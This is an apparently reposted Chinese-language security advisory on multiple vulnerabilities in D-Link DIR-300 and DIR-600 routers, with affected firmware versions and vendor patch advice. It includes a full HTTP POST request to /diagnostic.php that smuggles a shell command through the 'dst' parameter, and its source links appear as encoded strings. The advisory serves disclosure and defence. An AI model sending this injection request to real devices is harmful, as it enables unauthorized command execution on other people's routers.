受影响系统:
D-Link DIR-300
D-Link DIR-600
描述:
BUGTRAQ ID: 59405
D-Link DIR-600和DIR-300均是无线路由器产品。
D-Link DIR-600和DIR-300在实现上存在多个安全漏洞,包括多个命令注入漏洞、跨站请求伪造漏洞、跨站脚本漏洞、密码加密漏洞、信息泄露漏洞、HTTP标头注入漏洞、安全措施绕过漏洞,恶意用户可利用这些漏洞泄露某些系统信息、解密已存储密码、在受影响设备上下文中执行任意命令、窃取cookie身份验证凭证、在用户会话上下文中执行未授权操作、重定向用户到任意站点、HTTP请求走私并控制受影响设备。
1、设备没有限制对router_info.xml的访问,通过错误消息可泄露完整路径;
2、设备没有限制对DevInfo.txt和version.txt的访问,可造成某些设备信息泄露;
3、设备没有限制对command.php的访问,通过特制的HTTP请求,可导致执行任意shell命令。影响范围:D-Link DIR-300 v2.12和2.13、D-Link DIR-600 v2.12b02, 2.13b01, 2.14b01.
4、设备没有限制对diagnostic.php的访问,通过特制的HTTP请求,可导致执行某些OS命令。影响范围:D-Link DIR-300 v2.13b01、D-Link DIR-600 v2.15b01之前版本
<*来源:Michael Messner (michae.messner@integralis.com)
链接:
a25K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5%4g2J5k6h3I4A6M7%4c8Q4x3X3g2U0L8$3#2Q4x3V1k6W2L8W2)9J5c8X3q4V1N6X3W2K6L8%4u0A6k6i4y4Q4x3V1j5#2x3U0l9^5x3l9`.`.
e66K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4x3K6j5%4g2J5x3i4c8&6i4K6u0W2k6r3g2Q4x3V1k6E0x3h3q4V1N6U0t1H3x3e0y4Q4x3X3b7H3x3o6x3`.
c30K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4x3K6j5%4g2J5x3i4c8&6i4K6u0W2k6r3g2Q4x3V1k6E0x3h3q4V1N6U0t1H3x3e0y4Q4x3X3b7H3x3e0M7`.
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Michael Messner (michae.messner@integralis.com)提供了如下测试方法:
* OS命令注入:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
act=ping&dst=%26%20COMMAND%26
建议:
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
4ddK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3c8D9K9h3&6C8i4K6u0W2j5$3!0E0i4K6u0r3N6h3E0Q4x3V1k6W2L8W2)9J5c8Y4y4#2M7s2m8G2M7Y4c8Q4x3V1k6K6k6h3y4#2M7X3W2@1P5g2!0q4x3W2)9^5x3q4)9^5b7R3`.`.
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
